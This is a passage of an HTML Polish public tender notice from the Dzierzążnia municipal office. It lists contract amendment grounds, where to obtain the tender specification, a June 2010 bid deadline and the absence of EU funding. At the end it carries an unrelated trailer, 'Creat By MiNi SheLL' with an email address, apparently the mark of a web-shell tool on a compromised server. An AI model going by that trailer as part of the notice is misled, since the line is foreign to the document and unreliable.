d.	Związane z ewentualnymi pomyłkami i brakami w wielobranżowej dokumentacji oraz związanych z nią przedmiarach robót, na podstawie, której realizowana jest inwestycja, co powoduje konieczność zlecenia robót dodatkowych lub uzupełniających lub zamiennych Wykonawcy (roboty projektowe i wykonawcze), poprzez zmianę terminu realizacji zamówienia.
e.	Siła wyższa - jest to zdarzenie, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które uniemożliwia wykonawcy wykonanie w części lub całości jego zobowiązań.
f.	W przypadku wystąpienia robót zamiennych, poprzez zmianę terminu realizacji zamówienia.
g.	W przypadku ponadprzeciętnego czasu trwania procedur administracyjnych, poprzez zmianę terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> htp://ugdzierzaznia.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD  GMINY  W  DZIERZĄŻNI
DZIERZĄŻNIA 28
09-164 DZIERZĄŻNIA 
powiat płoński 
woj. mazowieckie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2010 godzina 10:00, miejsce: URZĄD  GMINY  W  DZIERZĄŻNI
DZIERZĄŻNIA 28
09-164 DZIERZĄŻNIA 
powiat płoński 
woj. mazowieckie
pok. 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com